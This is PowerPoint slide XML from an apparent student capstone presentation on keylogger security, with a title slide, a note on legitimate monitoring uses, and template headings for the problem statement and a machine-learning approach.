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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Libre Franklin"/>
      <p:regular r:id="rId15"/>
      <p:bold r:id="rId16"/>
      <p:italic r:id="rId17"/>
      <p:boldItalic r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Franklin Gothic"/>
      <p:bold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3" name="Shape 2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048696"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7"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8"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9"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00"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1"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49"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048633" name="Google Shape;150;p9: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1;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55"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048637" name="Google Shape;156;p10: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8" name="Google Shape;157;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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644" name="Google Shape;162;p1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5" name="Google Shape;163;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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048607" name="Google Shape;112;p4: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8"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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048611" name="Google Shape;118;p5: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2" name="Google Shape;119;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23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048615" name="Google Shape;124;p6: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6" name="Google Shape;12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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048620" name="Google Shape;130;p7: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1"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36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048625" name="Google Shape;137;g26d839f967f_0_2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6" name="Google Shape;138;g26d839f967f_0_2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43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048629" name="Google Shape;144;p8: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0" name="Google Shape;145;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2"/>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20;p2"/>
          <p:cNvSpPr txBox="1"/>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2"/>
          <p:cNvSpPr txBox="1"/>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2"/>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2"/>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2"/>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8" name="Shape 76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669" name="Google Shape;77;p11"/>
          <p:cNvSpPr txBox="1"/>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78;p11"/>
          <p:cNvSpPr txBox="1"/>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1" name="Google Shape;79;p11"/>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80;p11"/>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3" name="Google Shape;81;p11"/>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6" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048654" name="Google Shape;83;p12"/>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84;p12"/>
          <p:cNvSpPr txBox="1"/>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85;p12"/>
          <p:cNvSpPr txBox="1"/>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7" name="Google Shape;86;p12"/>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87;p12"/>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9" name="Google Shape;88;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0" name="Google Shape;89;p12"/>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90;p12"/>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91;p12"/>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25"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048594" name="Google Shape;26;p3"/>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7;p3"/>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6" name="Google Shape;28;p3"/>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1" name="Shape 29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048639" name="Google Shape;30;p4"/>
          <p:cNvSpPr txBox="1"/>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0" name="Google Shape;31;p4"/>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1" name="Google Shape;32;p4"/>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2" name="Google Shape;33;p4"/>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9" name="Shape 34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048674" name="Google Shape;35;p5"/>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36;p5"/>
          <p:cNvSpPr txBox="1"/>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37;p5"/>
          <p:cNvSpPr txBox="1"/>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77" name="Google Shape;38;p5"/>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8" name="Google Shape;39;p5"/>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9" name="Google Shape;40;p5"/>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0" name="Shape 41"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048680" name="Google Shape;42;p6"/>
          <p:cNvSpPr txBox="1"/>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1" name="Google Shape;43;p6"/>
          <p:cNvSpPr txBox="1"/>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2" name="Google Shape;44;p6"/>
          <p:cNvSpPr txBox="1"/>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3" name="Google Shape;45;p6"/>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4" name="Google Shape;46;p6"/>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5" name="Google Shape;47;p6"/>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65" name="Shape 48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048646" name="Google Shape;49;p7"/>
          <p:cNvSpPr txBox="1"/>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7" name="Google Shape;50;p7"/>
          <p:cNvSpPr txBox="1"/>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48" name="Google Shape;51;p7"/>
          <p:cNvSpPr txBox="1"/>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49" name="Google Shape;52;p7"/>
          <p:cNvSpPr txBox="1"/>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50" name="Google Shape;53;p7"/>
          <p:cNvSpPr txBox="1"/>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1" name="Google Shape;54;p7"/>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2" name="Google Shape;55;p7"/>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3" name="Google Shape;56;p7"/>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1" name="Shape 57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048686" name="Google Shape;58;p8"/>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7" name="Google Shape;59;p8"/>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8" name="Google Shape;60;p8"/>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61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048689" name="Google Shape;62;p9"/>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0" name="Google Shape;63;p9"/>
          <p:cNvSpPr txBox="1"/>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1" name="Google Shape;64;p9"/>
          <p:cNvSpPr txBox="1"/>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692" name="Google Shape;65;p9"/>
          <p:cNvSpPr txBox="1"/>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93" name="Google Shape;66;p9"/>
          <p:cNvSpPr txBox="1"/>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4" name="Google Shape;67;p9"/>
          <p:cNvSpPr txBox="1"/>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5" name="Google Shape;68;p9"/>
          <p:cNvSpPr txBox="1"/>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7" name="Shape 69"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048663" name="Google Shape;70;p10"/>
          <p:cNvSpPr txBox="1"/>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4" name="Google Shape;71;p10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447817" y="641350"/>
            <a:ext cx="11290859" cy="3651249"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048665" name="Google Shape;72;p10"/>
          <p:cNvSpPr txBox="1"/>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66" name="Google Shape;73;p10"/>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74;p10"/>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8" name="Google Shape;75;p10"/>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txBox="1"/>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
          <p:cNvSpPr txBox="1"/>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5;p1"/>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6;p1"/>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2" name="Google Shape;17;p1"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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359108" y="1821635"/>
            <a:ext cx="9144000" cy="977778"/>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KEYLOGGERS SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048590" name="Google Shape;97;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329782" y="1034321"/>
            <a:ext cx="12726648" cy="472400"/>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IN" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name="Google Shape;98;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980300" cy="5740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000" i="0" lang="en-IN" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kings Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>College</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, CSE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Department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Shape 152"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048631" name="Google Shape;153;p22"/>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840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" lang="en-IN"/>
              <a:t>By employers to observe employees computer activities. By parents to supervise their children’s internet usage. By device owners to track possible unauthorized activity on their devices.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-206121" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048632" name="Google Shape;154;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0" bIns="45700" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="45700" wrap="square">
            <a:normAutofit fontScale="97727" lnSpcReduction="20000"/>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158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048635" name="Google Shape;159;p23"/>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36" name="Google Shape;160;p23"/>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2208"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN">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64"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048643" name="Google Shape;165;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463041" y="2766218"/>
            <a:ext cx="9298744" cy="1325563"/>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02"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048597" name="Google Shape;103;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849573" y="558468"/>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8" name="Google Shape;104;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849575"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IN">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Problem Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" lang="en-IN">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Should not include 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System Development Approach </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" lang="en-IN">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Technology Used)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Result (Output Image)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08"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048601" name="Google Shape;109;p15"/>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PROBLEM STATEMENT</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048602" name="Google Shape;110;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452403" y="1237632"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="45700" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="45700" wrap="square">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="-206121" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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14"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048605" name="Google Shape;115;p16"/>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6" name="Google Shape;116;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441671" y="1087378"/>
            <a:ext cx="11613485" cy="5563973"/>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IN">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IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Data Collection: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IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Data Preprocessing:</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IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Machine Learning Algorithm:</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IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Deployment:</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sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Evaluation: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1" sz="1200" lang="en-IN">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algn="l" indent="-305435" lvl="1" marL="629920" rtl="0">
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1104"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en-IN"/>
              <a:t>Result:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>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20"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
